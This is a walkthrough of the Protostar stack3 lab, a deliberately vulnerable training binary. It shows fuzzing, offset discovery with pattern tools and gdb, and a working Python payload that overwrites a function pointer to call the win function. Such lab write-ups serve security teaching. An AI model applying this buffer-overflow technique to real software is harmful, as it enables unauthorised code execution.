Protostar - Stack3

You can find the protostar there > Protostar

Let’s solve this now without the source code.

Let’s run the binary first & check what it does.

1
2
user@protostar:/opt/protostar/bin$ ./stack3
pwn

Takes a user input, let’s find out if the binary is vulnerable.

1
2
3
user@protostar:/opt/protostar/bin$ python -c 'print "A" * 100' | ./stack3
calling function pointer, jumping to 0x41414141
Segmentation fault

segfault confirms that binary is vulnerable to buffer overflow.

Let’s find now the size of the buffer (exact number of characters that overwrite the EIP)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

$ gdb -q ./stack3
Reading symbols from /opt/protostar/bin/stack3...done.
(gdb) r
Starting program: /opt/protostar/bin/stack3 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
calling function pointer, jumping to 0x63413163

Program received signal SIGSEGV, Segmentation fault.
0x63413163 in ?? ()

$ ./pattern_offset.rb -q 0x63413163
[*] Exact match at offset 64

Perfect, if we run objdump we can see the win function :

1
2
user@protostar:/opt/protostar/bin$ objdump -d ./stack3 | grep win
08048424 <win>:

objdump -> disassembler

We can now build our exploit, we know the buffer 64bytes & we have the address of the win function.

1
2
3
user@protostar:/opt/protostar/bin$ python -c 'print "A" * 64 + "$\x84\x04\x08"' | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed